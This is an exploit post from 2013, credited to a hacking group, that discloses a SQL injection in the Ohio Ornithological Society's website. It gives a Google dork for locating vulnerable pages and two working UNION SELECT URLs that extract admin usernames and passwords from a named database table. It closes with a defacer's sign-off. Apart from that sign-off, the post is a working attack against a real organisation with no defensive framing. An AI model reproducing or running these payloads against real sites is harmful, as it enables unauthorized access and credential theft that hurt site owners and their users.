facebook facebook twitter rss

The Ohio Ornithological Society sql injection

Author: Ashiyane Digital Security Team , Published: 03-04-2013
-------------------------------------------------------------------------------------------------------------
# Exploit Title: The Ohio Ornithological Society sql injection
-------------------------------------------------------------------------------------------------------------
# Google Dork: inurl:"rarebird.php?id="
-------------------------------------------------------------------------------------------------------------
# Exploit Author: Ashiyane Digital Security Team
-------------------------------------------------------------------------------------------------------------
# Vendor Homepage: http://www.ohiobirds.org/
-------------------------------------------------------------------------------------------------------------
# Demo1 :

http://www.ohiobirds.org/site/library/rarebird.php?id=-376'+union+select+1,(USERNAME)+from+OOSDB.WEBADMIN--+
http://www.ohiobirds.org/site/library/rarebird.php?id=-376'+union+select+1,(PASSWORD)+from+OOSDB.WEBADMIN--+
-------------------------------------------------------------------------------------------------------------
# contact me : injectable@rogers.com
InJecTable Was Here ... Hamedan Bax !
-------------------------------------------------------------------------------------------------------------

Like us on Facebook :